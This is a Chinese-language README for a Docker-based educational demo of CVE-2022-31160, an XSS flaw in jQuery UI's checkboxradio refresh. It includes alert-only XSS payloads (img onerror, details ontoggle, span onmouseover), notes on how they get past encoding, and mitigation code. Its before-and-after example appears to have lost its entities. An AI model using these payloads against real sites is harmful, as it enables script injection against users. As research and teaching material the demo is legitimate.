本项目演示 jQuery UI Checkboxradio 组件刷新漏洞(CVE-2022-31160),该漏洞会在组件刷新操作期间进行 HTML 实体解码,从而可能导致跨站脚本(XSS)攻击。
⚠️ 本项目包含可用的 XSS 载荷,仅供教育和研究目的使用。
当 checkboxradio 组件在包裹于 label 内的 input 上初始化时,对该组件调用 .checkboxradio("refresh") 会导致 label 内容中的 HTML 实体被错误解码。这会将安全编码的恶意内容转换为可执行的 JavaScript。
<!-- Safe encoded content -->
<label for="checkbox">
Text <img src=x onerror="alert('XSS')">
<input type="checkbox" id="checkbox">
</label>
<!-- After .checkboxradio("refresh") -->
<label for="checkbox">
Text
<input type="checkbox" id="checkbox">
</label>
# Clone or navigate to the project directory
cd jquery-cve-2022-31160
# Build the Docker image
docker build -t jquery-cve-2022-31160 .
# Run the container
docker run -p 3000:3000 jquery-cve-2022-31160
容器运行后,请访问:
jquery-cve-2022-31160/
├── README.md # This documentation
├── Dockerfile # Docker container configuration
├── package.json # Node.js dependencies
├── server.js # Express.js server
└── simplified-survey.html # Survey-style demonstration
simplified-survey.html)URL:http://localhost:3000/survey
功能特性:
<img src=x onerror="..."> - 立即执行<details ontoggle="..." open> - 立即执行<span onmouseover="..."> - 交互式执行分析工具:
.checkboxradio("refresh")// Vulnerable operation
$('#vulnerable-checkbox').checkboxradio();
$('#vulnerable-checkbox').checkboxradio("refresh"); // Triggers vulnerability
演示包含多种载荷,用于测试不同的 XSS 执行方法:
<!-- Network Security: Error event XSS (Immediate execution) -->
<img src=x onerror="console.log('XSS via widget refresh!'); alert('Widget refresh XSS executed!');">
<!-- Mobile Security: Details toggle XSS (Immediate execution) -->
<details ontoggle="alert('Mobile Security XSS executed!'); console.log('Mobile XSS via details ontoggle!')" open><summary></summary></details>
<!-- Cloud Security: Interactive XSS (User interaction required) -->
<span onmouseover="alert('Hover XSS executed!'); console.log('Cloud Security XSS via mouseover!')" style="text-decoration:underline; cursor:pointer;">[Hover to trigger]</span>
onerror)src=x 时必然报错)ontoggle)open 属性可保证触发)onmouseover)事件处理程序优势:
innerHTML 插入时即可执行<script> 标签限制ontoggle)高度可靠编码绕过:
<、")会被 jQuery UI 刷新操作解码docker build -t jquery-cve-2022-31160 .
# Run on default port 3000
docker run -p 3000:3000 jquery-cve-2022-31160
# Run on custom port
docker run -p 8080:3000 jquery-cve-2022-31160
# Run in background
docker run -d -p 3000:3000 jquery-cve-2022-31160
# Run with custom name
docker run --name jquery-xss-demo -p 3000:3000 jquery-cve-2022-31160
# List running containers
docker ps
# Stop the container
docker stop jquery-cve-2022-31160
# Remove the container
docker rm jquery-cve-2022-31160
# Remove the image
docker rmi jquery-cve-2022-31160
以下类型的应用程序可能受到该漏洞的利用:
.checkboxradio("refresh") 调用// Before refresh, sanitize or validate content
function safeRefresh(element) {
// Validate label content before refresh
const label = $(`label[for="${element.attr('id')}"]`);
const content = label.html();
// Check for potentially dangerous content
if (content.includes('<') || content.includes('javascript:')) {
console.warn('Potentially dangerous content detected');
return;
}
element.checkboxradio("refresh");
}
// Express.js security headers
app.use((req, res, next) => {
res.setHeader('X-Content-Type-Options', 'nosniff');
res.setHeader('X-Frame-Options', 'DENY');
res.setHeader('X-XSS-Protection', '1; mode=block');
res.setHeader('Content-Security-Policy', "default-src 'self'");
next();
});
本项目可作为以下人群的教育资源:
使用此演示时:
欢迎贡献!请按照以下步骤:
本软件仅供教育和研究目的使用。作者和贡献者:
本项目以 MIT 许可证提供,仅用于教育目的。
为安全研究与教育而创建 | 请负责任地使用 | 通过正当渠道报告漏洞